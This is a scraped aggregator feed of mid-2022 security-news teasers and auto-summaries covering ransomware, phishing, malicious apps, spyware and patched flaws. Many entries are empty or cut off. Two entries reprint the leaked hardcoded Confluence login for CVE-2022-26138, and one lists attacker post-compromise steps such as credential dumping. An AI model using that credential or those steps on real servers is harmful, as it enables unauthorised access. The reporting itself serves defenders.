for brand impersonation With 11,041 unique phishing URLs, Microsoft is the top target for brand impersonation. The popularity of Microsoft 365 among SMBs and enterprises has … More
The post The most impersonated brand in phishing attacks? Microsoft appeared first on Help Net Security.
"Autosummary:
Phishing attacks increased in Q1, then declined in Q2 According to the report, which you can read in full here, Q1 saw the most phishing attacks, with 81,447 unique phishing URLs detected, compared to 53,198 in Q2. "Ransomware attacks are in decline, according to reports by several cybersecurity companies. Why is that? More effort for less pay In its mid-year 2022 Cyber Threat Report, SonicWall notes that there has been a global 23% drop in ransomware, “as geopolitical forces, volatile cryptocurrency prices, and increased government and law-enforcement focus impacted both who cybercriminals chose to attack and how well they were capable of carrying out those attacks.” After witnessing many high-profile destructive attacks, … More
The post Ransomware gangs are hitting roadblocks, but aren’t stopping (yet) appeared first on Help Net Security.
"Autosummary:
More effort for less pay In its mid-year 2022 Cyber Threat Report, SonicWall notes that there has been a global 23% drop in ransomware, “as geopolitical forces, volatile cryptocurrency prices, and increased government and law-enforcement focus impacted both who cybercriminals chose to attack and how well they were capable of carrying out those attacks.” "Cyberattacks like ransomware, BEC scams and data breaches are some of the key issues businesses are facing today, but despite the number of high-profile incidents, many boardrooms are reluctant to free up budget to invest in the cybersecurity measures necessary to avoid becoming the next victim. In this Help Net Security interview, Former Pentagon Chief Strategy Officer Jonathan Reiber, VP Cybersecurity Strategy and Policy, AttackIQ, discusses how now, more than ever, companies need to protect … More
The post Cyberattack prevention is cost-effective, so why aren’t businesses investing to protect? appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Former Pentagon Chief Strategy Officer Jonathan Reiber, VP Cybersecurity Strategy and Policy, AttackIQ, discusses how now, more than ever, companies need to protect themselves from cyber threat actors.By adopting specialised frameworks to counteract cyber threats, for instance, running a threat-informed defence, utilising automated platforms such as Breach-and-Attack Simulation (BAS), CISO’S can continuously test and validate their system.CISO’s need to be aware of the current threat landscape, in a post-COVID world, remote work has opened a volt to new vulnerabilities, the forward thinking CISO of today needs to put into place preventative cybersecurity measures to manage the long term risk to a company. "The Federal Communications Commission (FCC) warned Americans of the rising threat of smishing (robotexts) attacks. The Federal Communications Commission (FCC) issued an alert to warn Americans of the rising threat of smishing (robotexts) attacks aimed at stealing their personal information or for financial scams. “The FCC’s Robocall Response Team is alerting consumers to the rising […]
The post US Federal Communications Commission (FCC) warns of the rise of smishing attacks appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
BlackCat strikes gas again The ALPHV/BlackCat ransomware group added Creos to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails. "The ALPHV/BlackCat ransomware gang claims to have breached the European gas pipeline Creos Luxembourg S.A. The ALPHV/BlackCat ransomware gang claims to have hacked the European gas pipeline Creos Luxembourg S.A. Creos Luxembourg S.A. owns and manages electricity networks and natural gas pipelines in the Grand Duchy of Luxembourg. In this capacity, the company plans, constructs […]
The post ALPHV/BlackCat ransomware gang claims to have stolen data from Creos Luxembourg S.A. appeared first on Security Affairs.
"Autosummary:
In this capacity, the company plans, constructs and maintains high, medium and low-voltage electricity networks and high, medium and low-pressure natural gas pipelines, which it owns or which it is responsible for managing. BlackCat has been operating since at least November 2021, and launched major attacks in January to disrupt OilTanking GmbH, a German fuel company, and in February 2022, the attack on an aviation company, Swissport. "Resecurity partners with CFBD to expand Resecurity’s AI-driven cybersecurity solutions and services to Peru. As Peru’s digital economy expands, cyber threats are increasingly prominent, with 32% of organizations in Peru suffering cyber-attacks from 2018-2020. Compounding these threats, Peru’s organizations face the challenges of limited security talent, early-stage digitalism, and access to cybersecurity solutions that help organizations mitigate risk and automate security workflows. To accelerate the implementation of AI-powered cybersecurity and threat intelligence in Peru, Resecurity … More
The post Resecurity partners with CFBD to mitigate risk for Peruvian enterprises appeared first on Help Net Security.
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Israel’s new cyber-kinetic lab will boost the resilience of critical infrastructure In a building under construction at the Advanced Technologies Park in Be’er Sheva, the “cyber capital” of Israel, a new governmental lab is also taking shape: the National Cyber-Kinetic Lab for ICS and OT. Attackers are slowly abandoning malicious macros Malicious macro-enabled documents as vehicles for email-based malware delivery … More
The post Week in review: Attackers abandoning malicious macros, average data breach cost soars appeared first on Help Net Security.
"Autosummary:
New infosec products of the week: July 29, 2022 Here’s a look at the most interesting products from the past week, featuring releases from Aqua Security, NetApp, Rapid7, Runecast, and Teleport. The future of attack surface management (ASM) In this Help Net Security video, David Monnier, Team Cymru Fellow, talks about what lies ahead for attack surface management, the findings from the recent State of Attack Surface Management report, and offers advice for security leaders evaluating existing or potential ASM platforms. "The researchers discovered over a dozen Android Apps on Google Play Store, collectively dubbed DawDropper, that were dropping Banking malware. Trend Micro researchers uncovered a malicious campaign that leveraged 17 seemingly harmless Android dropper apps, collectively tracked as DawDropper, on the Google Play Store to distribute banking malware. The DawDropper apps are masqueraded as productivity and utility apps such […]
The post 17 Android Apps on Google Play Store, dubbed DawDropper, were serving banking malware appeared first on Security Affairs.
"Autosummary:
Call Recorder APK (com.caduta.aisevsk) Rooster VPN (com.vpntool.androidweb) Super Cleaner- hyper & smart (com.j2ca.callrecorder) Document Scanner – PDF Creator (com.codeword.docscann) Universal Saver Pro (com.virtualapps.universalsaver) Eagle photo editor (com.techmediapro.photoediting) Call recorder pro+ (com.chestudio.callrecorder) Extra Cleaner (com.casualplay.leadbro) Crypto Utils (com.utilsmycrypto.mainer) FixCleaner (com.cleaner.fixgate) Just In: Video Motion (com.olivia.openpuremind) com.myunique.sequencestore com.flowmysequto.yamer com.qaz.universalsaver Lucky Cleaner (com.luckyg.cleaner) Simpli Cleaner (com.scando.qukscanner) Unicc QR Scanner (com.qrdscannerratedx) “Cybercriminals are constantly finding ways to evade detection and infect as many devices as possible. "Threat actors that go online with the moniker Adrastea claim to have hacked the multinational manufacturer of missiles MBDA. MBDA is a European multinational developer and manufacturer of missiles that was the result of the merger of the main French, British and Italian missile systems companies (Aérospatiale–Matra, BAE Systems, and Finmeccanica (now Leonardo). The name MBDA comes from the initialism of the names missile companies: Matra, BAe Dynamics and Alenia. A threat actor […]
The post Threat actor claims to have hacked European manufacturer of missiles MBDA appeared first on Security Affairs.
"Autosummary:
“The downloaded data contains confidential and closed information about the employees of your company, which took part in the development of closed military projects of MBDA (PLANCTON, CRONOS, CA SIRIUS, EMADS, MCDS, B1NT etc.) and about the commercial activities of your company in the interests of the Ministry of Defense of the European Union (design documentation of the air defense, missile systems and systems of coastal protection, drawings, presentation , video and photo (3D) materials, contract agreements and correspondence with other companies Rampini Carlo, Netcomgroup, Rafael, Thales, ST Electronics etc.).” "Autosummary:
"I’m proud to announce the release of the “ENISA THREAT LANDSCAPE FOR RANSOMWARE ATTACKS” report, Enjoy it! Ransomware has become one of the most dangerous threats for organizations worldwide. Cybercriminal organizations and ransomware gangs have devised new business models that are attracting a broad range of advanced threat actors. It is quite easy today for […]
The post Reading the “ENISA THREAT LANDSCAPE FOR RANSOMWARE ATTACKS” report appeared first on Security Affairs.
"Autosummary:
"US Critical Infrastructure Security Agency (CISA) adds the critical Confluence flaw, tracked as CVE-2022-26138, to its Known Exploited Vulnerabilities Catalog. US CISA has added the recently disclosed Confluence vulnerability, tracked as CVE-2022-26138, to its list of bugs abused in the wild, a flaw that can provide remote attackers with hardcoded credentials following successful exploitation. According to Binding Operational Directive (BOD) […]
The post CISA orders to patch an actively exploited flaw in Confluence servers appeared first on Security Affairs.
"Autosummary:
CVE-2022-26138 Default Atlassian Confluence password has been leaked – Username disabledsystemuser – Email dontdeletethisuser@email.com – Password disabled1system1user6708 Update Questions for Confluence app ver "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The three men - Omowale Owolabi, 31, of Navan Co Meath, 32-year-old Raak Sami Sadu, of Clonsilla, Dublin, and Samson Ajayi, 33, of Grangerath, Co Meath - admitted their involvement in the fraudulent scheme where they created a fake profile in the name of "Neil Turner" on the Plenty of Fish website. "A Panaseer survey of global insurers across the UK and US found that 82% are expecting the rise in premiums to continue, with 74% of insurers agreeing that their inability to accurately understand a customer’s security posture is impacting price increases. This Help Net Security video highlights how the increasing cost of ransomware affects global insurers.
The post Ransomware looms large over the cyber insurance industry appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Indeed, researchers from IronNet took the wraps off a large-scale campaign utilizing a four-month-old PhaaS platform dubbed Robin Banks to plunder credentials and steal financial information from customers of well-known banks in Australia, Canada, the U.K., and the U.S. "While the primary motivation for scammers using this kit appears to be financial, the kit does also ask victims for their Google and Microsoft credentials after they travel to the phishing landing page, indicating it could also be used by more advanced threat actors looking to gain initial access to corporate networks for ransomware or other post-intrusion activities," the researchers said. "Threat actors are actively exploiting the recently patched critical flaw in Atlassian Confluence Server and Data Center Recenlty Atlassian released security updates to address a critical hardcoded credentials vulnerability in Confluence Server and Data Center tracked as CVE-2022-26138. A remote, unauthenticated attacker can exploit the vulnerability to log into unpatched servers. Once installed the Questions […]
The post Exploitation is underway for a critical flaw in Atlassian Confluence Server and Data Center appeared first on Security Affairs.
"Autosummary:
CVE-2022-26138 Default Atlassian Confluence password has been leaked – Username disabledsystemuser – Email dontdeletethisuser@email.com – Password disabled1system1user6708 Update Questions for Confluence app ver "Threat actors used multiple npm packages to target Discord users with malware designed to steal their payment card data. A malicious campaign targeting Discord users leverages multiple npm packages to deliver malware that steals their payment card information, Kaspersky researchers warn. The malicious code hidden in the packages, and tracked as Lofy Stealer, is a […]
The post Malware-laced npm packages used to target Discord users appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"The FCC tracks consumer complaints – rather than call or text volume – and complaints about unwanted text messages have risen steadily in recent years from approximately 5,700 in 2019, 14,000 in 2020, 15,300 in 2021, to 8,500 through June 30, 2022," the US communications watchdog"s Robocall Response Team said [PDF]. "Autosummary:
"Autosummary:
"Microsoft linked the recently discovered Raspberry Robin Windows malware to the notorious Evil Corp operation. On July 26, 2022, Microsoft researchers discovered that the FakeUpdates malware was being distributed via Raspberry Robin malware. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The malicious code […]
The post Microsoft experts linked the Raspberry Robin malware to Evil Corp operation appeared first on Security Affairs.
"Autosummary:
In many cases, the infection process led to the deployment of custom Cobalt Strike loaders attributed to DEV-0243, which falls under activities tracked by the experts “EvilCorp,” Around November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload, experts believe that DEV-0243 threat actors used a RaaS payload by the “EvilCorp” activity group to avoid attribution. "Autosummary:
"A considerable drop in the median of ransom payments and several other circumstances are causing the ransomware landscape to change.
The post The ransomware landscape changes as fewer victims decide to pay appeared first on Malwarebytes Labs.
"Autosummary:
Groups like Conti were absorbed by existing and new Ransomware-as-a-Service (RaaS) groups such as Black Basta, BlackCat, Hive, and Quantum. Different targets With the shift from large botnets as the initial foothold to targeted attacks, the affiliates can not only be more picky when it comes to their victims, some can also choose between RaaS providers or decide to proceed on their own. "Autosummary:
"Autosummary:
MyAppsAnywhere services, which include Hosted GP, Hosted CRM, Hosted Exchange, and Hosted Sharepoint, will be offline until further notice. "According to a new Tessian report, 30% employees do not think they personally play a role in maintaining their company’s cybersecurity posture. What’s more, only 39% of employees say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. When asked why, 42% of employees said they wouldn’t know if they had caused an incident in the first place, and 25% say they just don’t … More
The post 1 in 3 employees don’t understand why cybersecurity is important appeared first on Help Net Security.
"Autosummary:
What’s more, only 39% of employees say they’re very likely to report a security incident, making investigation and remediation even more challenging and time-consuming for security teams. "Infortrend Technology introduces immutable object storage or write-once-read-many (WORM) and multi-factor authentication (MFA) security features to their EonStor GS unified storage solutions, ensuring the safety of stored data, specifically against ransomware. Ransomware attacks today are still rising, showing that the traditional ways to prevent these threats such as firewalls and antivirus are not full-proof methods. Therefore, enterprises have started utilizing immutable or WORM storage repositories to take advantage of its write-once-read-many characteristics to protect archived … More
The post Infortrend introduces WORM and MFA features on EonStor GS to keep data safe from ransomware appeared first on Help Net Security.
"Autosummary:
"Increased cyber threats and government directives have made cybersecurity a top priority among critical infrastructure organizations. This Help Net Security video highlights how leaders rethink their approach to cybersecurity for operations.
The post Cybersecurity is becoming a top priority among critical infrastructure operators appeared first on Help Net Security.
"Autosummary:
"Microsoft linked a private-sector offensive actor (PSOA) to attacks using multiple zero-day exploits for its Subzero malware. The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) researchers linked a threat group known as Knotweed to an Austrian surveillance firm named DSIRF, known for using multiple Windows and Adobe zero-day exploits. The […]
The post European firm DSIRF behind the attacks with Subzero surveillance malware appeared first on Security Affairs.
"Autosummary:
Microsoft researchers observed a variety of post-compromise actions on infected systems: Setting of UseLogonCredential to “1” to enable plaintext credentials Credential dumping via comsvcs.dll Attempt to access emails with dumped credentials from a KNOTWEED IP address Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF Researchers from threat intelligence firm RiskIQ, using passive DNS data related to Knotweed attacks, linked the C2 infrastructure used by the malware since February 2020 to DSIRF. “In 2021, MSRC received a report of two Windows privilege escalation exploits (CVE-2021-31199 and CVE-2021-31201) being used in conjunction with an Adobe Reader exploit (CVE-2021-28550), all of which were patched in June 2021. "Autosummary:
The company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called DSIRF that"s linked to the development and attempted sale of a piece of cyberweapon referred to as Subzero, which can be used to hack targets" phones, computers, and internet-connected devices. "NetRise and Fortress Information Security form a strategic partnership. This partnership gives Fortress Information Security’s global customers access to the firmware binary analysis platform. The NetRise team’s experience in data science, machine learning; and software reverse engineering expands Fortress customers’ ability to identify and catalog risk across a much larger set of devices and images. NetRise gains access to a robust route to market for power, oil and gas and manufacturing clients that Fortress serves, … More
The post Fortress Information Security and NetRise form a partnership to extend XIoT offering appeared first on Help Net Security.
"Autosummary:
"IBM Security released the 2022 Cost of a Data Breach Report, revealing costlier and higher-impact data breaches than ever before, with the global average cost of a data breach reaching an all-time high of $4.35 million for studied organizations. With breach costs increasing nearly 13% over the last two years of the report, the findings suggest these incidents may also be contributing to rising costs of goods and services. In fact, 60% of studied organizations … More
The post The global average cost of a data breach reaches an all-time high of $4.35 million appeared first on Help Net Security.
"Autosummary:
2022 Cost of a Data Breach Report: Key findings Critical infrastructure lags in zero trust Almost 80% of critical infrastructure organizations studied don’t adopt zero trust strategies, seeing average breach costs rise to $5.4 million – a $1.17 million increase compared to those that do. Phishing becomes costliest breach cause While compromised credentials continued to reign as the most common cause of a breach (19%), phishing was the second (16%) and the costliest cause, leading to $4.91 million in average breach costs for responding organizations. "While 81% of SMBs are monitored by a security operations center (SOC), 57% do not operate 24 hours a day, 7 days a week. Considering that 69% of SMBs feel they are facing critical and expanding cybersecurity threats and 75% say cyberattacks have increased in the past three years, the lack of 24/7 coverage continues to put SMBs at risk, according to a survey by Forrester and Pondurance. Cybercriminals and threat actors work around the … More
The post How SMBs are evolving their cybersecurity operations practices appeared first on Help Net Security.
"Autosummary:
By engaging the right security operations partners, respondents expect to see increased customer trust (49%), reduced risk (47%), increased revenue (45%), improved efficiencies (44%) and increased employee engagement (44%). "T-Mobile has proposed to settle its 2021 data breach by paying $350 million, along with an incremental spend of $150 million in security.
The post T-Mobile agrees to pay customers $350 million in settlement over data breach appeared first on Malwarebytes Labs.
"Autosummary:
Posted: July 27, 2022 by T-Mobile has proposed to settle its 2021 data breach by paying $350 million, along with an incremental spend of $150 million in security. "Autosummary:
It works by scanning for installed browsers such as Google Chrome, Microsoft Edge, Brave Browser, and Mozilla Firefox to extract all the stored cookies and access tokens, alongside stealing information from the victim"s personal Facebook account such as name, email address, date of birth, and user ID. "Autosummary:
The exposure of the asset, The business sensitivity of the asset, The severity of the vulnerability reported against the asset, The availability of an exploit for the vulnerability reported, The complexity of the exploit, if it is available, The taxonomy of the vulnerability reported. * Asset could be anything within your organization, like a web application, mobile application, code repository, router, server, database, etc. Time spent to prioritize vulnerabilities An example of a high prioritized vulnerability would be if the asset which is affected is publicly exposed, has a critical business sensitivity, the vulnerability severity is critical, an exploit is available, and does not require user interaction or authentication/privileges. "Researchers found similarities between LockBit 3.0 ransomware and BlackMatter, which is a rebranded variant of the DarkSide ransomware. Cybersecurity researchers have found similarities between the latest version of the LockBit ransomware, LockBit 3.0, and the BlackMatter ransomware. The Lockbit 3.0 ransomware was released in June with important novelties such as a bug bounty program, Zcash payment, and new extortion […]
The post The strange similarities between Lockbit 3.0 and Blackmatter ransomware appeared first on Security Affairs.
"Autosummary:
“With the release of this latest variant — and the launch of LockBit’s bug bounty program, which rewards its affiliates — we expect the LockBit ransomware group to be even more active in the coming days.” concludes the report. "Autosummary:
On systems where Knotweed deployed its malware, Microsoft has observed a variety of post-compromise actions, including: Setting of UseLogonCredential to "1" to enable plaintext credentials Credential dumping via comsvcs.dll Attempt to access emails with dumped credentials from a KNOTWEED IP address Using Curl to download KNOTWEED tooling from public file shares such as vultrobjects[.]com Running PowerShell scripts directly from a GitHub gist created by an account associated with DSIRF Among the zero-days used in Knotweed campaigns, Microsoft highlights the recently patched CVE-2022-22047, which helped the attackers escalate privileges, escape sandboxes, and gain system-level code execution. "We take a look at a security advisory from PrestaShop which warns of compromised stores and redirected payment data.
The post PrestaShop warns of vulnerability: Update your stores now! appeared first on Malwarebytes Labs.
"Autosummary:
The exploit has its own CVE, known as CVE-2022-36408, and (from PrestaShop’s security advisory) relates to a “previously unknown vulnerability chain that we are fixing“. "In this post, a security expert breaks down three tips on how businesses can have an easier time dealing with ransomware attacks.
The post Simplifying the fight against ransomware: An expert explains appeared first on Malwarebytes Labs.
"Autosummary:
Finally, these features are valuable for detecting and thwarting all malware , not just ransomware: Exploit prevention Behavioral detection of never-before-seen malware Malicious website blocking Brute force protection , not just ransomware: On the ease-of-use front, Robert Zamani, Regional Vice President, Americans Solutions Engineering at Malwarebytes, also has four suggestions when choosing an EDR platform: Ask about the time required to set up the management console and whether it’s cloud-based .Choose an effective and easy-to-use Endpoint Detection and Response (EDR) software When it comes to ransomware, resource-constrained organizations with small-to-non-existent security teams are in greater need of EDR—but many EDR products are designed for large enterprises with large and highly-skilled security teams.Avoid common mistakes in prevention, detection and response Often, a customer who gets hit with ransomware has security software but they either have it disabled or it’s outdated or limited in its ability, thanks to poor configuration, Kujawa says. The importance of “knowing thy enemy” Most ransomware attacks are not sophisticated, state-sponsored cyber operations, Kujawa says. "Autosummary:
Photo Editor - Design Maker (gb.twentynine.redaktoridea) Photo Editor & Background Eraser (de.photoground.twentysixshot) Photo & Exif Editor (de.xnano.photoexifeditornine) Photo Editor - Filters Effects (de.hitopgop.sixtyeightgx) Photo Filters & Effects (de.sixtyonecollice.cameraroll) Photo Editor : Blur Image (de.instgang.fiftyggfife) Photo Editor : Cut, Paste (de.fiftyninecamera.rollredactor) Emoji Keyboard: Stickers & GIF (gb.crazykey.sevenboard) Neon Theme Keyboard (com.neonthemekeyboard.app) Neon Theme - Android Keyboard (com.androidneonkeyboard.app) Cashe Cleaner (com.cachecleanereasytool.app) Fancy Charging (com.fancyanimatedbattery.app) FastCleaner: Cashe Cleaner (com.fastcleanercashecleaner.app) Call Skins - Caller Themes (com.rockskinthemes.app) Funny Caller (com.funnycallercustomtheme.app) CallMe "Autosummary:
The targeted entities include Citibank, Bank of America, Capital One, Wells Fargo, PNC, U.S. Bank, Lloyds Bank, the Commonwealth Bank in Australia, and Santander. "Autosummary:
One stealer observed by Intel 471, known as Blitzed Grabber, uses Discord’s webhooks feature to deposit data lifted by the malware, including autofill data, bookmarks, browser cookies, VPN client credentials, payment card information, cryptocurrency wallets and passwords, researchers said.Once the malware infects a system, threat actors can swipe passwords, session cookies, login credentials and credit-card details from popular browsers– including Google Chrome, Chromium, Opera, Slimjet and Vivaldi–and then deposit that stolen info “into a Telegram channel of their choosing,” researchers said. "It pays to be careful – here’s how you can stay safe from fake giveaways, money flipping scams and other cons that fraudsters use to trick payment app users out of their hard-earned cash
The post Cash App fraud: 10 common scams to watch out for appeared first on WeLiveSecurity
"Autosummary:
In some cases, sugar daddy scammers, too, may ask their targets to make upfront payments using Cash App or another peer-to-peer payment app with the promise of receiving larger sums of money later. The rise of Cash App Cash App is used by tens of millions of people each month, especially because among other things, the app allows users to send and receive money instantly.It pays to be careful – here’s how you can stay safe from fake giveaways, money flipping scams and other cons that fraudsters use to trick payment app users out of their hard-earned cash For today’s consumers, convenience is king.And the firm’s support team will never request a sign-in code, PIN, Social Security Number (SSN), a payment or the downloading of a remote access app.And the firm’s support team will never request a sign-in code, PIN, Social Security Number (SSN), a payment or the downloading of a remote access app. "Autosummary:
The US Department of Justice this week, announced that it would not be prosecuting Uber over the data breach, after the firm "admitted to and accepted responsibility for the acts of its officers, directors, employees, and agents in concealing its 2016 data breach from the FTC. "Autosummary:
Overview of CosmicStrand UEFI malware execution source: Kaspersky Mark Lechtik, a former Kaspersky reverse engineer, now at Mandiant, who was involved in the research, explains that the compromised firmware images came with a modified CSMCORE DXE driver, which enables a legacy boot process. "Driven by security operations complexity, 46% of organizations are consolidating or plan on consolidating the number of vendors they do business with. As a result of this drive toward security technology consolidation, 77% of infosec pros would like to see more industry cooperation and support for open standards promoting interoperability. As thousands of cybersecurity technology vendors compete against each other across numerous security product categories, organizations are aiming to optimize all security technologies in their … More
The post Infosec pros want more industry cooperation and support for open standards appeared first on Help Net Security.
"Autosummary:
(51%) In addition: 53% tend to purchase or will in the future purchase security technology platforms rather than best-of-breed products 84% believe that a product’s integration capabilities are important and 86% of respondents say it is either critical or important that best-of-breed products are built for integration with other products After cost (46%), product integration capabilities are the most important security product consideration for 37% of security professionals Evaluating “enterprise-class” security vendors As the security technology market consolidates, “centers of gravity” will become established around a few large vendors and affect future buying strategies; organizations will place more bets on fewer security technology vendors. "Autosummary:
"Thera actors are exploiting a zero-day vulnerability to steal payment information from sites using the open source e-commerce platform PrestaShop. Threat actors are targeting websites using open source e-commerce platform PrestaShop by exploiting a zero-day flaw, tracked as CVE-2022-36408, that can allow to execute arbitrary code and potentially steal customers’ payment information. PrestaShop is currently used by 300,000 shops worldwide […]
The post Zero Day attacks target online stores using PrestaShop appeared first on Security Affairs.
"Autosummary:
Threat actors are targeting websites using open source e-commerce platform PrestaShop by exploiting a zero-day flaw, tracked as CVE-2022-36408, that can allow to execute arbitrary code and potentially steal customers’ payment information. "Autosummary:
"Autosummary:
Code to generate login requests (WithSecure) The stolen information includes the cookies, IP address, account information (name, email, birthday, user ID), 2FA codes, and geolocation data, essentially allowing the threat actor to continue this access from their machine. "Autosummary:
"Autosummary:
"Autosummary:
Phishing By the Numbers Other top abused brands in phishing attacks include Credit Agricole, WhatsApp, and French telecommunications company Orange. "Autosummary:
Monitor login attempts and create a lookout for spikes Keep IoT devices on protected networks Perform continuous security testing on IoT devices The Closure DDoS attacks are the standard intent of an IoT botnet.Further, most IoT devices include serious security issues like weak passwords, open access to management systems, default administrative credentials, or weak security configurations. "Autosummary:
Two of the listed apps, "Water Reminder" and "Yoga – For Beginner to Advanced," are still on the Play Store, having 100,000 and 50,000 downloads, respectively. "SonicWall GMS and Analytics are vulnerable to an SQL injection bug, tracked as CVE-2022-22280.
The post SonicWall urges customers to patch critical SQL injection bug ASAP appeared first on Malwarebytes Labs.
"Autosummary:
~ SonicWall advisory Clients using Analytics 2.5.0.3-2520 or earlier and/or GMS 9.3.1-SP2-Hotfix1 or earlier are advised to update to their patched versions, Analytics 2.5.0.3-2520-Hotfix1 and GMS 9.3.1-SP2-Hotfix-2, respectively. "Autosummary:
"Latin America has seen the largest increase in attacks, spotting one out of 23 organizations impacted weekly, a 43% increase YoY, compared to one out of 33 in Q2 2021, followed by Asia region that has seen a 33% increase YoY, reaching one out of 17 organizations impacted weekly," the Israeli cybersecurity firm said. "Autosummary:
Here"s the roadmap that financial institutions like Sander Capital Management are following: Step 1 — Knowing their attack surface Using Pentera to map their web-facing attack surface, they"re gathering a complete understanding of their domains, IPs, networks, services, and websites. Manual penetration testing Manual penetration testing allows organizations to see how a bank"s controls, for example, stand up to a real-world attack, while providing the added input of the attacker"s perspective.In most cases, a cybersecurity team will only receive a CVSS severity rating (none, low, medium, high, or critical) for each issue detected by the scan. "Autosummary:
Attackers also can use information such as stolen session cookies, access tokens, 2FA codes, user agents, IP address and geolocation, as well as general account information, to cloak and impersonate the victim, researchers said. The first general information-stealing component scans an infected machine for Google Chrome, Microsoft Edge, Brave Browser or Firefox and, for each one it finds, extracts all stored cookies, including any Facebook session cookie. "Qakbot malware operators are using the Windows Calculator to side-load the malicious payload on target systems. Security expert ProxyLife and Cyble researchers recently uncovered a Qakbot campaign that was leveraging the Windows 7 Calculator app for DLL side-loading attacks. Dynamic-link library (DLL) side-loading is an attack method that takes advantage of how Microsoft Windows applications handle DLL […]
The post Threat actors leverages DLL-SideLoading to spread Qakbot malware appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Global M&A hit new highs in 2021 reaching an eye-popping $5.1 trillion in total deal value, according to PwC. With economic headwinds leaving acquisition as the only viable exit, further consolidation in the market is inevitable. One thing that typically gets overlooked in that M&A frenzy, is the technical difficulties of inheriting digital assets of the acquired company and the cybersecurity risk that comes with it. In this Help Net Security video, Lenny Zeltser, CISO … More
The post Minimizing risk: Key cybersecurity-related M&A considerations appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Operators behind the Amadey Bot malware use the SmokeLoader to distribute a new variant via software cracks and keygen sites. Amadey Bot is a data-stealing malware that was first spotted in 2018, it also allows operators to install additional payloads. The malware is available for sale in illegal forums, in the past, it was used […]
The post Amadey malware spreads via software cracks laced with SmokeLoader appeared first on Security Affairs.
"Autosummary:
Mikrotik Router Management Program Winbox Outlook FileZilla Pidgin Total Commander FTP Client RealVNC, TightVNC, TigerVNC WinSCP “Initially distributed through exploit kits in the past, Amadey has been installed through SmokeLoader from malicious websites disguised as download pages for cracks and serials of commercial software until recently. "The ransomware group Lockbit claims to have stolen 78 GB of files from the Italian Revenue Agency (Agenzia delle Entrate). The ransomware gang Lockbit claims to have hacked the Italian Revenue Agency (Agenzia delle Entrate) and added the government agency to the list of victims reported on its dark web leak site. “The Revenue Agency, operational since 1 January […]
The post Lockbit ransomware gang claims to have breached the Italian Revenue Agency appeared first on Security Affairs.
"Autosummary:
The group claims to have stolen 78GB of data, including company documents, scans, financial reports, and contracts, it plans to release screenshots of files and samples very soon. "Researchers at Intezer have published an analysis of a modular and versatile malware targeting Linux systems called Lightning Framework
The post Lightning Framework, modular Linux malware appeared first on Malwarebytes Labs.
"Autosummary:
The Lightening Framework The Lightning Framework has a modular structure, consisting of a downloader (Lightning.Downloader) and a core module (Lightning.Core), with a number of plugins. "Autosummary:
The "shellcodes received from the [command-and-control] server might be stagers for attacker-supplied PE executables, and it is very likely that many more exist," Kaspersky noted, adding it found a total of two versions of the rootkit, one which was used between the end of 2016 and mid-2017, and the latest variant, which was active in 2020. "Autosummary:
"We believe attackers are targeting shops using outdated software or modules, vulnerable third-party modules, or a yet-to-be-discovered vulnerability," explains the PrestaShop security advisory. "We take a look at claims that virtual pet favourite, Neopets, has had its user database breached, and what you can do about it.
The post Lock down your Neopets account: Data breach being investigated appeared first on Malwarebytes Labs.
"Autosummary:
Usernames Names Email address Date of birth Zip code Date of Birth Gender Country Registration email Considering the young age of many Neopets players, this would be quite bad from a privacy and safety standpoint, if the breach turns out to be genuine.Posted: July 25, 2022 by We take a look at claims that virtual pet favourite, Neopets, has had its user database breached, and what you can do about it. "MenuDrive, Harbortouch, and InTouchPOS fell victim to a long Magecart infection that started in January and only ended days ago.
The post Malware spent months hoovering up credit card details from 300 US restaurants appeared first on Malwarebytes Labs.
"Autosummary:
Although MenuDrive, Harbortouch, and InTouchPOS are not as popular as Uber Eats, Hungrrr, or DoorDash, many small, local restaurants across the US outsource their online ordering process to them as it’s cost-effective. "Intel and MediaTek announced a partnership to manufacture chips using Intel Foundry Services’ (IFS) process technologies. The agreement is designed to help MediaTek build a supply chain through the addition of a new foundry partner with capacity in the United States and Europe. MediaTek plans to use Intel process technologies to manufacture multiple chips for a range of smart edge devices. IFS offers a manufacturing platform with technologies optimized for high performance, low power and … More
The post Intel partners with MediaTek to manufacture new chips for a range of smart edge devices appeared first on Help Net Security.
"Autosummary:
"Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor. Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […]
The post CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China appeared first on Security Affairs.
"Autosummary:
The victims identified by the researchers are private individuals located in China, Vietnam, Iran, and Russia, with no link with any organization or industry vertical. "Autosummary:
POST request exfiltrating screenshots (ASEC) One of the downloaded DLL plugins, "cred.dll," which is run through "rundll32.exe," attempts to steal information from the following software: Mikrotik Router Management Program Winbox Outlook FileZilla Pidgin Total Commander FTP Client RealVNC, TightVNC, TigerVNC WinSCP Of course, if RedLine is loaded onto the host, the targeting scope is expanded dramatically, and the victim risks losing account credentials, communications, files, and cryptocurrency assets. "Autosummary:
